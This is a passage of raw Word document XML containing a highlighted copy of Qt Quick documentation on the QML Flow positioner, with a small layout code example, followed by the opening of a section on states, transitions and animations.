        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> items.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Flow items </w:t>
      </w:r>
      <w:r w:rsidRPr="008A2AAC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arrange items</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a similar way to</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2382" w:anchor="grid" w:history="1">
        <w:r w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Grid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items, with items arranged in lines along one axis (the minor axis), and lines of items placed next to each other along another axis (the major axis). The direction of flow, as well as the spacing between items, are controlled by the</w:t>
      </w:r>
      <w:r w:rsidR="008A2AAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2383" w:anchor="flow-prop" w:history="1">
        <w:r w:rsidRPr="008A2AAC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>flow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008A2AAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="008A2AAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2384" w:anchor="spacing-prop" w:history="1">
        <w:r w:rsidRPr="008A2AAC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>spacing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008A2AAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The following </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4DA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows a Flow item containing a number of</w:t>
      </w:r>
      <w:r w:rsidR="00633AC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2385" w:history="1">
        <w:r w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00633AC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>child items. These are arranged in a similar way to those shown in the screenshots.</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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color</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"lightblue"</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width</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300</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height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200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Flow</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        anchors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fill</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parent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anchors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margins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4</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spacing</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10</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Text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text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"Text"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font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pixelSize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40</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Text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text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"items"</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font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pixelSize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40</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Text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text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"flowing"</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font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pixelSize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40</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Text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text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"inside"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font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pixelSize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40</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Text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text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"a"</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font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pixelSize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40</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Text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text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"Flow"</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font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pixelSize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40</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text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text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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"item"</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font</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pixelSize</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>40</w:t>
      </w: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0B7D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The main </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4DA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>differences</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between the </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4DA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Grid and Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> positioners are that items inside a Flow will </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4DA8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wrap</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when they run out of space on the minor axis, and items on one line </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4DA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may not be aligned</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with items on another line if the items do not have uniform sizes. As with </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4DA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Grid</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> items, there is </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4DA8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no independent control of spacing</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between items and between lines of items.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2009" w:name="other-ways-to-position-items"/>
      <w:bookmarkStart w:id="2010" w:name="_Toc483000965"/>
      <w:bookmarkStart w:id="2011" w:name="_Toc483003956"/>
      <w:bookmarkStart w:id="2012" w:name="_Toc483604308"/>
      <w:bookmarkStart w:id="2013" w:name="_Toc483605528"/>
      <w:bookmarkEnd w:id="2009"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Other Ways to Position Items</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2010"/>
      <w:bookmarkEnd w:id="2011"/>
      <w:bookmarkEnd w:id="2012"/>
      <w:bookmarkEnd w:id="2013"/>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>several other ways</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to position items in a user interface. In addition to the basic technique of specifying their coordinates directly, they can be positioned relative to other items with</w:t>
      </w:r>
      <w:r w:rsidR="0036040C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2386" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>anchors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or used with</w:t>
      </w:r>
      <w:r w:rsidR="0036040C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2387" w:anchor="qml-data-models" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Data Models</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0036040C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>such as</w:t>
      </w:r>
      <w:r w:rsidR="0036040C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2388" w:anchor="visualitemmodel" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>VisualItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2389" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00666090">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-statesanimations-topic.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2014" w:name="_Toc483000966"/>
      <w:bookmarkStart w:id="2015" w:name="_Toc483003957"/>
      <w:bookmarkStart w:id="2016" w:name="_Toc483604309"/>
      <w:bookmarkStart w:id="2017" w:name="_Toc483605529"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Important Concepts in Qt Quick - States, Transitions and Animations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2014"/>
      <w:bookmarkEnd w:id="2015"/>
      <w:bookmarkEnd w:id="2016"/>
      <w:bookmarkEnd w:id="2017"/>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In any modern user-interface, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>transitioning between states and animating the user-interface is highly beneficial</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These are </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">first-class </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>concepts in Qt Quick</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This page describes the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>concept</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>states</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property animations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It details </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which concepts are important and why</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>how those concepts interrelate</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It also provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>links to in-depth detail</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> about the QML types that Qt Quick provides to implement those concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2018" w:name="states"/>
      <w:bookmarkStart w:id="2019" w:name="_Toc483000967"/>
      <w:bookmarkStart w:id="2020" w:name="_Toc483003958"/>
      <w:bookmarkStart w:id="2021" w:name="_Toc483604310"/>
      <w:bookmarkStart w:id="2022" w:name="_Toc483605530"/>
      <w:bookmarkEnd w:id="2018"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>States</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2019"/>
      <w:bookmarkEnd w:id="2020"/>
      <w:bookmarkEnd w:id="2021"/>
      <w:bookmarkEnd w:id="2022"/>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="008B1DCE" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
